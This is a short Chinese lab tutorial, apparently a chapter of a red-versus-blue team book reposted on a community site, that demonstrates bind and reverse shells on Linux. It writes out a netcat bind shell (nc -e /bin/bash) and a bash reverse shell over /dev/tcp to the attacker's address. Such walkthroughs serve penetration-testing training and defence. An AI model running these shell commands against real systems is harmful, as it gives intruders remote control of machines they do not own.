《红蓝攻防对抗实战》七.常规反弹之利用NC在Linux系统执行反弹shell
  4AFg6g0R0HXv 2023年11月19日 32 0


目录

一.利用NC工具在linux执行反弹shell

1.Linux正向连接shell

2.利用Linux自带bash反弹Shell


一.利用NC工具在linux执行反弹shell

《红蓝攻防对抗实战》七.常规反弹之利用NC在Linux系统执行反弹shell_bash

图1-1  Linux系统下实验拓扑图

1.Linux正向连接shell

  假设在linux操作系统中想要获取反弹shell,其中反弹方式和上述演示的Windows操作系统不同,以两台linux服务器为例进行实验,实验环境如图1-1 所示,使用正向连接shell的方式。

1)在目标服务器执行nc -lvp 8888 -e /bin/bash 命令来开启目标服务器的监听,如图1-2所示,当有应用程序访问到目标服务器的8888端口的程序时会将bash带出。

《红蓝攻防对抗实战》七.常规反弹之利用NC在Linux系统执行反弹shell_隧道穿透_02

图1-2  目标服务器开启监听

2)开启目标服务器的监听后,在攻击机执行nc 192.168.0.3 8888命令来连接目标服务器,此时会获得到目标服务器反弹出来的shell,使用ifconfig命令来验证是否是目标服务器的IP地址,执行结果如图1-3所示。

《红蓝攻防对抗实战》七.常规反弹之利用NC在Linux系统执行反弹shell_1024程序员节_03

图1-3  攻击机连接获取反弹shell

2.利用Linux自带bash反弹Shell

1)首先在攻击机中使用nc执行nc -lvp 8888命令开启监听,执行结果如图1-4所示。

《红蓝攻防对抗实战》七.常规反弹之利用NC在Linux系统执行反弹shell_1024程序员节_04

图1-4 攻击机开启监听

2)在目标服务器中执行bash -c "bash -i >& /dev/tcp/192.168.0.2/8888 0>&1命令来将shell反弹到攻击机上,其中192.168.0.2是攻击机的IP地址,8888是所监听的端口,如图1-5所示。

《红蓝攻防对抗实战》七.常规反弹之利用NC在Linux系统执行反弹shell_1024程序员节_05

图1-5 目标服务器发起连接

3)此时在攻击机中,可以看到已经成功接收到目标服务器反弹的shell,如图1-6所示。

《红蓝攻防对抗实战》七.常规反弹之利用NC在Linux系统执行反弹shell_1024程序员节_06

图1-6 攻击机获取反弹shell

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月19日 0

暂无评论

推荐阅读
4AFg6g0R0HXv